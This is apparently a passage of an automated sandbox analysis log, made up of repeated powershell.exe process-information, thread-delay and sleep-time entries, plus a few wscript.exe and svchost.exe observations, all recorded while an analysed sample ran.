      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1760
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8057
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1683
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5299
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2460
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1708
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4544
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5023
      Source: C:\Windows\System32\svchost.exe TID: 1824Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208Thread sleep count: 1760 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208Thread sleep count: 8057 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2804Thread sleep count: 1683 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4012Thread sleep count: 5299 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5324Thread sleep time: -7378697629483816s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1156Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1540Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184Thread sleep count: 2460 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184Thread sleep count: 1708 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3868Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 556Thread sleep count: 4544 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 556Thread sleep count: 5023 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
